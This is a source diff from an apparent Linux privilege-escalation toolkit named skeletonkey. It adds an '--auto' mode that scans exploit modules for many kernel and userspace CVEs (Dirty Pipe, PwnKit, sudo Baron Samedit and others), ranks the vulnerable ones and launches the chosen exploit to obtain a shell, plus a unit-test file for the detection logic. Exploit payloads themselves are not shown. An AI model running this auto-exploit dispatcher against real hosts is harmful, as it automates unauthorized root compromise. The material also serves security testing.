+     * miss vulnerabilities that a version-only check would flag as
+     * indeterminate (TEST_ERROR), or accept distro silent backports
+     * that the version check is fooled by. */
+    bool prev_active = ctx->active_probe;
+    ctx->active_probe = true;
+
+    /* Two-line host fingerprint banner (identity + capability gates). */
+    skeletonkey_host_print_banner(ctx->host, ctx->json);
+    fprintf(stderr, "[*] auto: active probes enabled — brief /tmp file "
+                    "touches and fork-isolated namespace probes\n");
+    fprintf(stderr, "[*] auto: scanning %zu modules for vulnerabilities...\n",
+            skeletonkey_module_count());
+
+    struct cand { const struct skeletonkey_module *m; int rank; } cands[64];
+    int nc = 0;
+    int n_vuln = 0, n_ok = 0, n_precond = 0, n_test = 0;
+    int n_crash = 0, n_timeout = 0, n_other = 0;
+    size_t n = skeletonkey_module_count();
+    for (size_t i = 0; i < n; i++) {
+        const struct skeletonkey_module *m = skeletonkey_module_at(i);
+        if (!m->detect || !m->exploit) continue;
+        int sig = 0;
+        bool timed_out = false;
+        skeletonkey_result_t r = run_detect_isolated(m, ctx, &sig, &timed_out);
+        if (sig != 0) {
+            const char *why = timed_out ? "timed out" : "crashed";
+            fprintf(stderr, "[?] auto: %-22s detect() %s "
+                            "(signal %d) — continuing\n",
+                    m->name, why, sig);
+            if (timed_out) n_timeout++;
+            else           n_crash++;
+            continue;
+        }
+        switch (r) {
+        case SKELETONKEY_VULNERABLE:
+            if (nc < 64) {
+                cands[nc].m = m;
+                cands[nc].rank = module_safety_rank(m->name);
+                fprintf(stderr, "[+] auto: %-22s VULNERABLE (safety rank %d)\n",
+                        m->name, cands[nc].rank);
+                nc++;
+            } else {
+                fprintf(stderr, "[+] auto: %-22s VULNERABLE (overflow; not "
+                                "considered for pick)\n", m->name);
+            }
+            n_vuln++;
+            break;
+        case SKELETONKEY_OK:
+            fprintf(stderr, "[ ] auto: %-22s patched or not applicable\n",
+                    m->name);
+            n_ok++;
+            break;
+        case SKELETONKEY_PRECOND_FAIL:
+            fprintf(stderr, "[ ] auto: %-22s precondition not met\n", m->name);
+            n_precond++;
+            break;
+        case SKELETONKEY_TEST_ERROR:
+            fprintf(stderr, "[?] auto: %-22s indeterminate "
+                            "(detector could not decide)\n", m->name);
+            n_test++;
+            break;
+        default:
+            fprintf(stderr, "[?] auto: %-22s %s\n", m->name, result_str(r));
+            n_other++;
+            break;
+        }
+    }
+
+    /* Restore caller's --active setting before we call exploit(). The
+     * exploit() of each module may use ctx->active_probe with different
+     * semantics than detect(); we owned this flag only for the scan. */
+    ctx->active_probe = prev_active;
+
+    fprintf(stderr, "\n[*] auto: scan summary — %d vulnerable, %d patched/"
+                    "n.a., %d precondition-fail, %d indeterminate%s\n",
+            n_vuln, n_ok, n_precond, n_test,
+            n_other ? " (+other)" : "");
+    if (n_crash > 0)
+        fprintf(stderr, "[!] auto: %d module(s) crashed during detect "
+                        "— dispatcher recovered via fork isolation\n", n_crash);
+    if (n_timeout > 0)
+        fprintf(stderr, "[!] auto: %d module(s) timed out (>%ds) during "
+                        "detect — dispatcher recovered\n",
+                n_timeout, SKELETONKEY_DETECT_TIMEOUT_SECS);
+
+    if (nc == 0) {
+        if (n_test > 0) {
+            fprintf(stderr, "[i] auto: %d module(s) returned indeterminate. "
+                            "Try `skeletonkey --exploit <name> --i-know` if "
+                            "you know the host is vulnerable.\n", n_test);
+        }
+        fprintf(stderr, "[-] auto: no confirmed-vulnerable modules. Host "
+                        "appears patched.\n");
+        return 0;
+    }
+
+    /* Sort descending by rank (safest first). */
+    for (int i = 0; i < nc; i++)
+        for (int j = i + 1; j < nc; j++)
+            if (cands[j].rank > cands[i].rank) {
+                struct cand t = cands[i]; cands[i] = cands[j]; cands[j] = t;
+            }
+
+    const struct skeletonkey_module *pick = cands[0].m;
+
+    if (ctx->dry_run) {
+        fprintf(stderr,
+"\n[*] auto: %d vulnerable module(s) found. Safest is '%s' (rank %d).\n"
+"[*] auto: --dry-run: would launch `--exploit %s --i-know`; not firing.\n",
+                nc, pick->name, cands[0].rank, pick->name);
+        if (nc > 1) {
+            fprintf(stderr, "[i] auto: other candidates (ranked):\n");
+            for (int i = 1; i < nc; i++)
+                fprintf(stderr, "      %-22s safety rank %d\n",
+                        cands[i].m->name, cands[i].rank);
+        }
+        return 0;
+    }
+
+    fprintf(stderr,
+"\n[*] auto: %d vulnerable module(s) found. Safest is '%s' (rank %d).\n"
+"[*] auto: launching --exploit %s...\n\n",
+            nc, pick->name, cands[0].rank, pick->name);
+
+    int xsig = 0;
+    bool exec_path = false;
+    skeletonkey_result_t r = run_callback_isolated(
+        "exploit", pick->exploit, ctx, &xsig, &exec_path);
+    if (xsig != 0) {
+        fprintf(stderr, "\n[!] auto: %s exploit crashed (signal %d) — "
+                        "dispatcher recovered via fork isolation\n",
+                pick->name, xsig);
+    } else if (exec_path) {
+        fprintf(stderr, "\n[*] auto: %s exploit transferred to spawned "
+                        "target (shell exited cleanly) — EXPLOIT_OK\n",
+                pick->name);
+    } else {
+        fprintf(stderr, "\n[*] auto: %s exploit returned %s\n",
+                pick->name, result_str(r));
+    }
+    if (r == SKELETONKEY_EXPLOIT_OK) return 5;
+    if (r == SKELETONKEY_EXPLOIT_FAIL && nc > 1) {
+        fprintf(stderr, "[i] auto: %d more candidate(s) available — try one manually:\n", nc - 1);
+        for (int i = 1; i < nc; i++)
+            fprintf(stderr, "      skeletonkey --exploit %s --i-know\n", cands[i].m->name);
+    }
+    return (r == SKELETONKEY_EXPLOIT_FAIL) ? 3 : (int)r;
+}
+
 static int cmd_one(const struct skeletonkey_module *m, const char *op,
                   const struct skeletonkey_ctx *ctx)
 {
+    if (ctx->dry_run) {
+        fprintf(stderr, "[*] %s: --dry-run: would run --%s; not firing.\n",
+                m->name, op);
+        return 0;
+    }
    skeletonkey_result_t (*fn)(const struct skeletonkey_ctx *) = NULL;
    if (strcmp(op, "exploit") == 0)        fn = m->exploit;
    else if (strcmp(op, "mitigate") == 0)  fn = m->mitigate;
@@ -681,41 +1322,40 @@ static int cmd_one(const struct skeletonkey_module *m, const char *op,
        fprintf(stderr, "[-] module '%s' has no %s operation\n", m->name, op);
        return 1;
    }
-    skeletonkey_result_t r = fn(ctx);
-    fprintf(stderr, "[*] %s --%s result: %s\n", m->name, op, result_str(r));
+    int sig = 0;
+    bool exec_path = false;
+    skeletonkey_result_t r = run_callback_isolated(op, fn, ctx, &sig, &exec_path);
+    if (sig != 0)
+        fprintf(stderr, "[!] %s --%s crashed (signal %d) — recovered\n",
+                m->name, op, sig);
+    else if (exec_path)
+        fprintf(stderr, "[*] %s --%s transferred to spawned target — EXPLOIT_OK\n",
+                m->name, op);
+    else
+        fprintf(stderr, "[*] %s --%s result: %s\n",
+                m->name, op, result_str(r));
    return (int)r;
 }

 int main(int argc, char **argv)
 {
-    /* Bring up the module registry. As new families land, add their
-     * register_* call here. */
-    skeletonkey_register_copy_fail_family();
-    skeletonkey_register_dirty_pipe();
-    skeletonkey_register_entrybleed();
-    skeletonkey_register_pwnkit();
-    skeletonkey_register_nf_tables();
-    skeletonkey_register_overlayfs();
-    skeletonkey_register_cls_route4();
-    skeletonkey_register_dirty_cow();
-    skeletonkey_register_ptrace_traceme();
-    skeletonkey_register_netfilter_xtcompat();
-    skeletonkey_register_af_packet();
-    skeletonkey_register_fuse_legacy();
-    skeletonkey_register_stackrot();
-    skeletonkey_register_af_packet2();
-    skeletonkey_register_cgroup_release_agent();
-    skeletonkey_register_overlayfs_setuid();
-    skeletonkey_register_nft_set_uaf();
-    skeletonkey_register_af_unix_gc();
-    skeletonkey_register_nft_fwd_dup();
-    skeletonkey_register_nft_payload();
+    /* Bring up the module registry. New module families register
+     * themselves via skeletonkey_register_all_modules() in
+     * core/registry.c — add the new register_*() call there so the
+     * test binary picks it up automatically. */
+    skeletonkey_register_all_modules();

    enum mode mode = MODE_SCAN;
    struct skeletonkey_ctx ctx = {0};
    const char *target = NULL;
    int i_know = 0;

+    /* Probe the host once, up front. ctx.host is a stable pointer
+     * shared by every module callback; populating now means each
+     * detect() sees the same fingerprint and no module has to re-do
+     * uname/getpwuid/sysctl reads. See core/host.{h,c}. */
+    ctx.host = skeletonkey_host_get();
+
    enum detect_format dr_fmt = FMT_AUDITD;
    static struct option longopts[] = {
        {"scan",          no_argument,       0, 'S'},
@@ -727,6 +1367,7 @@ int main(int argc, char **argv)
        {"module-info",   required_argument, 0, 'I'},
        {"audit",         no_argument,       0, 'A'},
        {"dump-offsets",  no_argument,       0,  8 },
+        {"auto",          no_argument,       0,  9 },
        {"format",        required_argument, 0,  6 },
        {"i-know",        no_argument,       0,  1 },
        {"active",        no_argument,       0,  2 },
@@ -734,6 +1375,8 @@ int main(int argc, char **argv)
        {"json",          no_argument,       0,  4 },
        {"no-color",      no_argument,       0,  5 },
        {"full-chain",    no_argument,       0,  7 },
+        {"dry-run",       no_argument,       0, 10 },
+        {"explain",       required_argument, 0, 11 },
        {"version",       no_argument,       0, 'V'},
        {"help",          no_argument,       0, 'h'},
        {0, 0, 0, 0}
@@ -757,6 +1400,9 @@ int main(int argc, char **argv)
        case  5 : ctx.no_color = true; break;
        case  7 : ctx.full_chain = true; break;
        case  8 : mode = MODE_DUMP_OFFSETS; break;
+        case  9 : mode = MODE_AUTO; ctx.authorized = i_know ? true : ctx.authorized; break;
+        case 10 : ctx.dry_run = true; break;
+        case 11 : mode = MODE_EXPLAIN; target = optarg; break;
        case  6 :
            if      (strcmp(optarg, "auditd") == 0) dr_fmt = FMT_AUDITD;
            else if (strcmp(optarg, "sigma")  == 0) dr_fmt = FMT_SIGMA;
@@ -781,8 +1427,10 @@ int main(int argc, char **argv)
    if (mode == MODE_SCAN) return cmd_scan(&ctx);
    if (mode == MODE_LIST) return cmd_list(&ctx);
    if (mode == MODE_MODULE_INFO) return cmd_module_info(target, &ctx);
+    if (mode == MODE_EXPLAIN) return cmd_explain(target, &ctx);
    if (mode == MODE_DETECT_RULES) return cmd_detect_rules(dr_fmt);
    if (mode == MODE_AUDIT) return cmd_audit(&ctx);
+    if (mode == MODE_AUTO) return cmd_auto(&ctx);
    if (mode == MODE_DUMP_OFFSETS) return cmd_dump_offsets(&ctx);

    /* --exploit / --mitigate / --cleanup all take a target */
@@ -0,0 +1,690 @@
+/*
+ * tests/test_detect.c — detect() unit tests
+ *
+ * Each test builds a synthetic struct skeletonkey_host fingerprint
+ * (vulnerable / patched / specific-gate-closed) and asserts each
+ * module's detect() returns the expected verdict. Catches regressions
+ * in the host-fingerprint-consuming logic across the corpus.
+ *
+ * Coverage today is the four modules that already consume ctx->host:
+ *   - dirtydecrypt   (CVE-2026-31635)
+ *   - fragnesia      (CVE-2026-46300)
+ *   - pack2theroot   (CVE-2026-41651)
+ *   - overlayfs      (CVE-2021-3493)
+ * Coverage grows automatically as more modules migrate to ctx->host
+ * (see ROADMAP "core/host" follow-up).
+ *
+ * Why only Linux: every module's real detect() lives inside
+ * `#ifdef __linux__`; on non-Linux the stubs unconditionally return
+ * PRECOND_FAIL so the tests are tautologies. The harness compiles
+ * cross-platform but skips the assertions on non-Linux to keep the
+ * macOS dev build green while still preventing bit-rot of the test
+ * infrastructure.
+ */
+
+#include "../core/module.h"
+#include "../core/host.h"
+#include "../core/registry.h"
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+
+extern const struct skeletonkey_module dirtydecrypt_module;
+extern const struct skeletonkey_module fragnesia_module;
+extern const struct skeletonkey_module pack2theroot_module;
+extern const struct skeletonkey_module overlayfs_module;
+extern const struct skeletonkey_module entrybleed_module;
+extern const struct skeletonkey_module dirty_pipe_module;
+extern const struct skeletonkey_module dirty_cow_module;
+extern const struct skeletonkey_module ptrace_traceme_module;
+extern const struct skeletonkey_module cgroup_release_agent_module;
+extern const struct skeletonkey_module nf_tables_module;
+extern const struct skeletonkey_module fuse_legacy_module;
+extern const struct skeletonkey_module cls_route4_module;
+extern const struct skeletonkey_module overlayfs_setuid_module;
+extern const struct skeletonkey_module af_packet_module;
+extern const struct skeletonkey_module af_packet2_module;
+extern const struct skeletonkey_module af_unix_gc_module;
+extern const struct skeletonkey_module netfilter_xtcompat_module;
+extern const struct skeletonkey_module nft_set_uaf_module;
+extern const struct skeletonkey_module nft_fwd_dup_module;
+extern const struct skeletonkey_module nft_payload_module;
+extern const struct skeletonkey_module stackrot_module;
+extern const struct skeletonkey_module sequoia_module;
+extern const struct skeletonkey_module vmwgfx_module;
+extern const struct skeletonkey_module copy_fail_gcm_module;
+extern const struct skeletonkey_module dirty_frag_esp_module;
+extern const struct skeletonkey_module dirty_frag_esp6_module;
+extern const struct skeletonkey_module dirty_frag_rxrpc_module;
+extern const struct skeletonkey_module sudo_samedit_module;
+extern const struct skeletonkey_module sudoedit_editor_module;
+extern const struct skeletonkey_module pwnkit_module;
+
+static int g_pass = 0;
+static int g_fail = 0;
+
+/* Record which modules at least one test row touched, so the harness
+ * can print a "modules without direct coverage" warning at the end.
+ * Linear append + scan is fine; we have <50 modules. The list is
+ * static-sized at SKELETONKEY_MAX_TESTED_MODULES; bump if we ever
+ * exceed it. */
+#define SKELETONKEY_MAX_TESTED_MODULES 128
+static const char *g_tested_modules[SKELETONKEY_MAX_TESTED_MODULES];
+static size_t g_tested_count = 0;
+
+static void mark_tested(const char *name)
+{
+	for (size_t i = 0; i < g_tested_count; i++)
+		if (strcmp(g_tested_modules[i], name) == 0) return;
+	if (g_tested_count < SKELETONKEY_MAX_TESTED_MODULES)
+		g_tested_modules[g_tested_count++] = name;
+}
+
+static const char *result_str(skeletonkey_result_t r)
+{
+	switch (r) {
+	case SKELETONKEY_OK:           return "OK";
+	case SKELETONKEY_TEST_ERROR:   return "TEST_ERROR";
+	case SKELETONKEY_VULNERABLE:   return "VULNERABLE";
+	case SKELETONKEY_EXPLOIT_FAIL: return "EXPLOIT_FAIL";
+	case SKELETONKEY_PRECOND_FAIL: return "PRECOND_FAIL";
+	case SKELETONKEY_EXPLOIT_OK:   return "EXPLOIT_OK";
+	}
+	return "???";
+}
+
+#ifdef __linux__
+/* Suppress per-module banner chatter so the test output stays tidy.
+ * Modules respect ctx->json to mean "structured output mode; no banners"
+ * — see each module's `if (!ctx->json) fprintf(...)` pattern. */
+static void run_one(const char *test_name,
+		    const struct skeletonkey_module *m,
+		    const struct skeletonkey_host *h,
+		    skeletonkey_result_t want)
+{
+	struct skeletonkey_ctx ctx = {0};
+	ctx.host = h;
+	ctx.json = true;        /* silence per-module log lines */
+
+	skeletonkey_result_t got = m->detect(&ctx);
+	mark_tested(m->name);
+	if (got == want) {
+		printf("[+] PASS  %-40s  %s → %s\n",
+		       test_name, m->name, result_str(got));
+		g_pass++;
+	} else {
+		fprintf(stderr,
+			"[-] FAIL  %-40s  %s: want %s, got %s\n",
+			test_name, m->name,
+			result_str(want), result_str(got));
+		g_fail++;
+	}
+}
+
+/* mk_host: derive a fingerprint from a base + a kernel override.
+ *
+ * The most common new-test shape is "I want fingerprint X but with a
+ * specific (major, minor, patch) — to nail a backport-boundary or
+ * predates-the-bug case". Doing this with a fresh struct literal each
+ * time obscures the *one* thing that's different. mk_host() does the
+ * copy + overlay, named release string included.
+ *
+ * Returns a struct VALUE so the caller stores it in a stack local and
+ * passes &h.  No heap. The release string is the caller's responsibility
+ * (we don't synthesize from numerics to avoid implying a real release
+ * naming convention). */
+#ifdef __linux__
+static struct skeletonkey_host
+mk_host(struct skeletonkey_host base, int major, int minor, int patch,
+        const char *release)
+{
+	base.kernel.major = major;
+	base.kernel.minor = minor;
+	base.kernel.patch = patch;
+	base.kernel.release = release;
+	return base;
+}
+#endif
+
+/* ── fingerprints ────────────────────────────────────────────────── */
+
+/* Linux 6.12.76 (Debian 13), no userns, no D-Bus, not Ubuntu — a
+ * deliberately neutered host that lets the host-fingerprint-only
+ * gates fire without falling into deeper module logic. */
+static const struct skeletonkey_host h_pre7_no_userns_no_dbus = {
+	.kernel  = { .major = 6, .minor = 12, .patch = 76,
+		     .release = "6.12.76-test" },
+	.arch    = "x86_64",
+	.nodename = "test",
+	.distro_id          = "debian",
+	.distro_version_id  = "13",
+	.distro_pretty      = "Debian GNU/Linux 13",
+	.is_linux           = true,
+	.is_debian_family   = true,
+	.unprivileged_userns_allowed = false,
+	.has_dbus_system    = false,
+	.has_systemd        = true,
+};
+
+/* Fedora 43, no Debian family, userns allowed. */
+static const struct skeletonkey_host h_fedora_no_debian = {
+	.kernel  = { .major = 6, .minor = 14, .patch = 0,
+		     .release = "6.14.0-fedora" },
+	.arch    = "x86_64",
+	.nodename = "test",
+	.distro_id          = "fedora",
+	.distro_version_id  = "43",
+	.distro_pretty      = "Fedora 43",
+	.is_linux           = true,
+	.is_rpm_family      = true,
+	.is_debian_family   = false,
+	.unprivileged_userns_allowed = true,
+	.has_dbus_system    = true,
+	.has_systemd        = true,
+};
+
+/* Modern fingerprint with a known-vulnerable sudo (1.8.31 sits in
+ * both the samedit [1.8.2, 1.9.5p1] and sudoedit_editor
+ * [1.8.0, 1.9.12p2) vulnerable ranges) AND a known-vulnerable polkit
+ * (0.105 is pre-0.121 fix). Used to assert the sudo/pwnkit modules
+ * accept the host-fingerprint version strings and reach the
+ * VULNERABLE-by-version path. */
+static const struct skeletonkey_host h_vuln_sudo = {
+	.kernel  = { .major = 5, .minor = 15, .patch = 0,
+		     .release = "5.15.0-vulnsudo" },
+	.arch    = "x86_64",
+	.nodename = "test",
+	.distro_id          = "debian",
+	.is_linux           = true,
+	.is_debian_family   = true,
+	.unprivileged_userns_allowed = true,
+	.sudo_version       = "1.8.31",
+	.polkit_version     = "0.105",
+};
+
+/* Modern fingerprint with a fixed sudo (1.9.13p1 is above both
+ * sudo_samedit and sudoedit_editor vulnerable ranges) AND a fixed
+ * polkit (0.121 is the upstream pwnkit fix release). */
+static const struct skeletonkey_host h_fixed_sudo = {
+	.kernel  = { .major = 6, .minor = 12, .patch = 0,
+		     .release = "6.12.0-fixedsudo" },
+	.arch    = "x86_64",
+	.nodename = "test",
+	.distro_id          = "debian",
+	.is_linux           = true,
+	.is_debian_family   = true,
+	.unprivileged_userns_allowed = true,
+	.sudo_version       = "1.9.13p1",
+	.polkit_version     = "0.121",
+};
+
+/* Ubuntu 24.04, userns allowed, D-Bus running, Debian family
+ * (because Ubuntu has /etc/debian_version). Used as the "fragnesia
+ * preconditions OK" baseline — fragnesia should NOT short-circuit
+ * on userns/userspace gates here. */
+static const struct skeletonkey_host h_ubuntu_24_userns_ok = {
+	.kernel  = { .major = 6, .minor = 8, .patch = 0,
+		     .release = "6.8.0-ubuntu" },
+	.arch    = "x86_64",
+	.nodename = "test",
+	.distro_id          = "ubuntu",
+	.distro_version_id  = "24.04",
+	.distro_pretty      = "Ubuntu 24.04 LTS",
+	.is_linux           = true,
+	.is_debian_family   = true,
+	.unprivileged_userns_allowed = true,
+	.has_dbus_system    = true,
+	.has_systemd        = true,
+};
+
+/* Ancient kernel that predates many bugs (Linux 4.4 LTS). Useful for
+ * the "kernel predates the bug → OK" path in dirty_pipe (bug
+ * introduced 5.8). */
+static const struct skeletonkey_host h_kernel_4_4 = {
+	.kernel  = { .major = 4, .minor = 4, .patch = 0,
+		     .release = "4.4.0-ancient" },
+	.arch    = "x86_64",
+	.nodename = "test",
+	.distro_id          = "debian",
+	.is_linux           = true,
+	.is_debian_family   = true,
+	.unprivileged_userns_allowed = true,
+};
+
+/* Recent kernel (Linux 6.12 LTS). Above virtually every backport
+ * threshold in the corpus — modules should report OK via the
+ * "patched by mainline inheritance" branch of kernel_range_is_patched. */
+static const struct skeletonkey_host h_kernel_6_12 = {
+	.kernel  = { .major = 6, .minor = 12, .patch = 0,
+		     .release = "6.12.0-recent" },
+	.arch    = "x86_64",
+	.nodename = "test",
+	.distro_id          = "debian",
+	.is_linux           = true,
+	.is_debian_family   = true,
+	.unprivileged_userns_allowed = true,
+};
+
+/* Vulnerable-era kernel (5.14.0) with userns ENABLED. The mirror
+ * of h_kernel_5_14_no_userns — for testing the VULNERABLE-by-version
+ * happy path on modules whose detect() reaches VULNERABLE once both
+ * version and userns gates are satisfied. Carrier file presence
+ * (sudo, su, etc.) is read from the actual filesystem; in CI the
+ * standard Debian containers provide those, so these tests are
+ * deterministic on Linux. */
+static const struct skeletonkey_host h_kernel_5_14_userns_ok = {
+	.kernel  = { .major = 5, .minor = 14, .patch = 0,
+		     .release = "5.14.0-vuln-userns-ok" },
+	.arch    = "x86_64",
+	.nodename = "test",
+	.distro_id          = "debian",
+	.is_linux           = true,
+	.is_debian_family   = true,
+	.unprivileged_userns_allowed = true,
+};
+
+/* Vulnerable-era kernel (5.14.0) with userns DISABLED. Most
+ * netfilter / overlayfs / cgroup-class modules need both an in-range
+ * kernel AND unprivileged userns. Kernel 5.14 was deliberately
+ * chosen to clear every module's "predates the bug" pre-check in
+ * this batch (nf_tables introduced 5.14; overlayfs_setuid 5.11;
+ * cls_route4/fuse_legacy older still) while remaining below every
+ * stable-branch backport entry (5.15.x / 5.18.x / 5.19.x in the
+ * relevant tables). The version check therefore says "VULNERABLE by
+ * version", and the userns gate fires next. */
+static const struct skeletonkey_host h_kernel_5_14_no_userns = {
+	.kernel  = { .major = 5, .minor = 14, .patch = 0,
+		     .release = "5.14.0-vuln-no-userns" },
+	.arch    = "x86_64",
+	.nodename = "test",
+	.distro_id          = "debian",
+	.is_linux           = true,
+	.is_debian_family   = true,
+	.unprivileged_userns_allowed = false,
+};
+#endif /* __linux__ */
+
+/* ── tests ───────────────────────────────────────────────────────── */
+
+static void run_all(void)
+{
+#ifdef __linux__
+	/* dirtydecrypt: kernel.major < 7 → predates the bug → OK */
+	run_one("dirtydecrypt: kernel 6.12 predates 7.0 → OK",
+		&dirtydecrypt_module, &h_pre7_no_userns_no_dbus,
+		SKELETONKEY_OK);
+
+	run_one("dirtydecrypt: kernel 6.14 (fedora) still predates → OK",
+		&dirtydecrypt_module, &h_fedora_no_debian,
+		SKELETONKEY_OK);
+
+	run_one("dirtydecrypt: kernel 6.8 (ubuntu) still predates → OK",
+		&dirtydecrypt_module, &h_ubuntu_24_userns_ok,
+		SKELETONKEY_OK);
+
+	/* fragnesia: userns disabled → XFRM gate closed → PRECOND_FAIL */
+	run_one("fragnesia: userns_allowed=false → PRECOND_FAIL",
+		&fragnesia_module, &h_pre7_no_userns_no_dbus,
+		SKELETONKEY_PRECOND_FAIL);
+
+	/* pack2theroot: not Debian family → PRECOND_FAIL */
+	run_one("pack2theroot: is_debian_family=false → PRECOND_FAIL",
+		&pack2theroot_module, &h_fedora_no_debian,
+		SKELETONKEY_PRECOND_FAIL);
+
+	/* pack2theroot: Debian family but no D-Bus socket → PRECOND_FAIL */
+	run_one("pack2theroot: has_dbus_system=false → PRECOND_FAIL",
+		&pack2theroot_module, &h_pre7_no_userns_no_dbus,
+		SKELETONKEY_PRECOND_FAIL);
+
+	/* overlayfs: distro != ubuntu → bug is Ubuntu-specific → OK */
+	run_one("overlayfs: distro=debian → not Ubuntu → OK",
+		&overlayfs_module, &h_pre7_no_userns_no_dbus,
+		SKELETONKEY_OK);
+
+	run_one("overlayfs: distro=fedora → not Ubuntu → OK",
+		&overlayfs_module, &h_fedora_no_debian,
+		SKELETONKEY_OK);
+
+	/* ── kernel-version-gate cases (post-migration coverage) ──── */
+
+	/* dirty_pipe: bug introduced in 5.8; kernel 4.4 predates → OK */
+	run_one("dirty_pipe: kernel 4.4 predates 5.8 → OK",
+		&dirty_pipe_module, &h_kernel_4_4,
+		SKELETONKEY_OK);
+
+	/* dirty_pipe: kernel 6.12 is above every backport entry → OK */
+	run_one("dirty_pipe: kernel 6.12 above all backports → OK",
+		&dirty_pipe_module, &h_kernel_6_12,
+		SKELETONKEY_OK);
+
+	/* dirty_cow: fix in mainline 4.9; kernel 6.12 is far above → OK */
+	run_one("dirty_cow: kernel 6.12 above 4.9 fix → OK",
+		&dirty_cow_module, &h_kernel_6_12,
+		SKELETONKEY_OK);
+
+	/* ptrace_traceme: fix in 5.1.17; kernel 6.12 above → OK */
+	run_one("ptrace_traceme: kernel 6.12 above 5.1.17 fix → OK",
+		&ptrace_traceme_module, &h_kernel_6_12,
+		SKELETONKEY_OK);
+
+	/* cgroup_release_agent: fix in mainline 5.17; kernel 6.12 above → OK */
+	run_one("cgroup_release_agent: kernel 6.12 above 5.17 fix → OK",
+		&cgroup_release_agent_module, &h_kernel_6_12,
+		SKELETONKEY_OK);
+
+	/* ── userns-gate cases ───────────────────────────────────── */
+
+	/* nf_tables: vulnerable kernel 5.10.0 + userns off → PRECOND_FAIL */
+	run_one("nf_tables: vuln kernel + userns=false → PRECOND_FAIL",
+		&nf_tables_module, &h_kernel_5_14_no_userns,
+		SKELETONKEY_PRECOND_FAIL);
+
+	/* fuse_legacy: vulnerable kernel + userns off → PRECOND_FAIL */
+	run_one("fuse_legacy: vuln kernel + userns=false → PRECOND_FAIL",
+		&fuse_legacy_module, &h_kernel_5_14_no_userns,
+		SKELETONKEY_PRECOND_FAIL);
+
+	/* cls_route4: vulnerable kernel + userns off → PRECOND_FAIL */
+	run_one("cls_route4: vuln kernel + userns=false → PRECOND_FAIL",
+		&cls_route4_module, &h_kernel_5_14_no_userns,
+		SKELETONKEY_PRECOND_FAIL);
+
+	/* overlayfs_setuid: vulnerable kernel (5.14, past the 5.11
+	 * introduction and below every backport) + userns off
+	 * → PRECOND_FAIL via userns gate */
+	run_one("overlayfs_setuid: vuln kernel + userns=false → PRECOND_FAIL",
+		&overlayfs_setuid_module, &h_kernel_5_14_no_userns,
+		SKELETONKEY_PRECOND_FAIL);
+
+	/* ── above-fix coverage for the remaining kernel modules ──
+	 * Kernel 6.12 is above every backport entry in the corpus.
+	 * For modules with a `kernel_range` table, kernel_range_is_patched
+	 * inherits via the "host is newer than every entry" branch and
+	 * detect() returns OK. */
+
+	run_one("af_packet: kernel 6.12 above 4.11 fix → OK",
+		&af_packet_module, &h_kernel_6_12, SKELETONKEY_OK);
+
+	run_one("af_packet2: kernel 6.12 above 5.9 fix → OK",
+		&af_packet2_module, &h_kernel_6_12, SKELETONKEY_OK);
+
+	run_one("af_unix_gc: kernel 6.12 above 6.6-rc1 fix → OK",
+		&af_unix_gc_module, &h_kernel_6_12, SKELETONKEY_OK);
+
+	run_one("netfilter_xtcompat: kernel 6.12 above 5.12 fix → OK",
+		&netfilter_xtcompat_module, &h_kernel_6_12, SKELETONKEY_OK);
+
+	run_one("nft_set_uaf: kernel 6.12 above 6.4-rc4 fix → OK",
+		&nft_set_uaf_module, &h_kernel_6_12, SKELETONKEY_OK);
+
+	run_one("nft_fwd_dup: kernel 6.12 above 5.17 fix → OK",
+		&nft_fwd_dup_module, &h_kernel_6_12, SKELETONKEY_OK);
+
+	run_one("nft_payload: kernel 6.12 above 6.2-rc4 fix → OK",
+		&nft_payload_module, &h_kernel_6_12, SKELETONKEY_OK);
+
+	run_one("stackrot: kernel 6.12 above 6.4-rc4 fix → OK",
+		&stackrot_module, &h_kernel_6_12, SKELETONKEY_OK);
+
+	run_one("sequoia: kernel 6.12 above 5.13.4 fix → OK",
+		&sequoia_module, &h_kernel_6_12, SKELETONKEY_OK);
+
+	run_one("vmwgfx: kernel 6.12 above 6.3-rc6 fix → OK",
+		&vmwgfx_module, &h_kernel_6_12, SKELETONKEY_OK);
+
+	/* ── ancient-kernel predates coverage ────────────────────────
+	 * Kernel 4.4 predates several module bugs introduced 5.x+. */
+
+	run_one("nft_set_uaf: kernel 4.4 predates 5.1 → OK",
+		&nft_set_uaf_module, &h_kernel_4_4, SKELETONKEY_OK);
+
+	run_one("stackrot: kernel 4.4 predates 6.1 → OK",
+		&stackrot_module, &h_kernel_4_4, SKELETONKEY_OK);
+
+	/* ── copy_fail_family bridge userns gate ─────────────────────
+	 * The 4 dirty_frag siblings + the GCM variant all reach the
+	 * bug via XFRM-ESP / AF_RXRPC paths gated on unprivileged
+	 * user-namespace creation. Bridge-layer precondition fires
+	 * before delegating to the inner DIRTYFAIL detect. copy_fail
+	 * itself uses AF_ALG (no userns needed) and bypasses the
+	 * gate — its detect would proceed to the inner active probe. */
+
+	run_one("copy_fail_gcm: userns_allowed=false → PRECOND_FAIL",
+		&copy_fail_gcm_module, &h_kernel_5_14_no_userns,
+		SKELETONKEY_PRECOND_FAIL);
+
+	run_one("dirty_frag_esp: userns_allowed=false → PRECOND_FAIL",
+		&dirty_frag_esp_module, &h_kernel_5_14_no_userns,
+		SKELETONKEY_PRECOND_FAIL);
+
+	run_one("dirty_frag_esp6: userns_allowed=false → PRECOND_FAIL",
+		&dirty_frag_esp6_module, &h_kernel_5_14_no_userns,
+		SKELETONKEY_PRECOND_FAIL);
+
+	run_one("dirty_frag_rxrpc: userns_allowed=false → PRECOND_FAIL",
+		&dirty_frag_rxrpc_module, &h_kernel_5_14_no_userns,
+		SKELETONKEY_PRECOND_FAIL);
+
+	/* ── userspace version fingerprinting (sudo) ─────────────────
+	 * Both sudo modules now consult ctx->host->sudo_version
+	 * populated once at startup. */
+
+	/* sudo_samedit: vulnerable sudo 1.8.31 (range [1.8.2, 1.9.5p1])
+	 * → VULNERABLE by version */
+	run_one("sudo_samedit: sudo_version=1.8.31 → VULNERABLE",
+		&sudo_samedit_module, &h_vuln_sudo,
+		SKELETONKEY_VULNERABLE);
+
+	/* sudo_samedit: fixed sudo 1.9.13p1 (above 1.9.5p1) → OK */
+	run_one("sudo_samedit: sudo_version=1.9.13p1 → OK",
+		&sudo_samedit_module, &h_fixed_sudo,
+		SKELETONKEY_OK);
+
+	/* pwnkit: vulnerable polkit 0.105 (pre-0.121 fix) → VULNERABLE */
+	run_one("pwnkit: polkit_version=0.105 → VULNERABLE",
+		&pwnkit_module, &h_vuln_sudo,
+		SKELETONKEY_VULNERABLE);
+
